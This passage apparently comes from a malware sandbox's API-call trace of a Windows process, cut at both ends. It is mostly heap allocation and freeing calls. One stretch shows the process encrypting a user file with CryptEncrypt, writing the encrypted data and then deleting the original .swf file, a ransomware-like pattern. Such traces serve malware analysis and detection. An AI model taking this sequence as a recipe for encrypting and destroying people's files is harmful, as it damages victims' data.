hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0108.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0108.389] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0108.390] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0108.390] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0108.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0108.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0108.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0108.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0108.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0108.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0108.391] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0108.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0108.391] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0108.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0108.391] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x135eb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x135f0) returned 1 [0108.391] CharLowerBuffW (in: lpsz="byte[79345]", cchLength=0xb | out: lpsz="byte[79345]") returned 0xb [0108.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0108.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0108.392] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ad600*, pdwDataLen=0x144e088*=0x135eb, dwBufLen=0x135f0 | out: pbData=0x49ad600*, pdwDataLen=0x144e088*=0x135f0) returned 1 [0108.392] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0108.392] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0108.392] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.392] WriteFile (in: hFile=0x258, lpBuffer=0x4529608*, nNumberOfBytesToWrite=0x135f0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4529608*, lpNumberOfBytesWritten=0x144ea8c*=0x135f0, lpOverlapped=0x0) returned 1 [0108.395] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0108.395] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0108.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0108.395] CryptDestroyKey (hKey=0x41ac140) returned 1 [0108.395] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0108.395] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0108.395] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.395] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0108.395] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0108.395] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.395] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.396] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0108.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0108.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0108.396] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0108.396] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.396] FreeLibrary (hLibModule=0x756e0000) returned 1 [0108.396] CloseHandle (hObject=0x298) returned 1 [0108.396] CloseHandle (hObject=0x258) returned 1 [0108.403] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\DU9VQvjn.swf", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\DU9VQvjn.swf", lpFilePart=0x0) returned 0x46 [0108.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0108.404] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\DU9VQvjn.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\du9vqvjn.swf")) returned 0x20 [0108.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0108.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0108.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0108.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0108.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0108.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0108.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0108.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0108.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0108.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0108.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0108.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0108.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0108.615] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\DU9VQvjn.swf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a8b2c0, ftCreationTime.dwHighDateTime=0x1d5e85a, ftLastAccessTime.dwLowDateTime=0x5dbb9c00, ftLastAccessTime.dwHighDateTime=0x1d5e858, ftLastWriteTime.dwLowDateTime=0x5dbb9c00, ftLastWriteTime.dwHighDateTime=0x1d5e858, nFileSizeHigh=0x0, nFileSizeLow=0x135eb, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="DU9VQvjn.swf", cAlternateFileName="")) returned 0x41ac500 [0108.616] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\DU9VQvjn.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\du9vqvjn.swf")) returned 1 [0108.618] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a8b2c0, ftCreationTime.dwHighDateTime=0x1d5e85a, ftLastAccessTime.dwLowDateTime=0x5dbb9c00, ftLastAccessTime.dwHighDateTime=0x1d5e858, ftLastWriteTime.dwLowDateTime=0x5dbb9c00, ftLastWriteTime.dwHighDateTime=0x1d5e858, nFileSizeHigh=0x0, nFileSizeLow=0x135eb, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="DU9VQvjn.swf", cAlternateFileName="")) returned 0 [0108.619] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0108.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0108.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0108.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0108.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0108.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0108.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0108.620] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0108.620] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0108.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0108.620] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0108.620] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0108.621] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0108.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0108.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0108.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0108.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x120) returned 0x43cc1c8 [0108.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0108.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0108.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 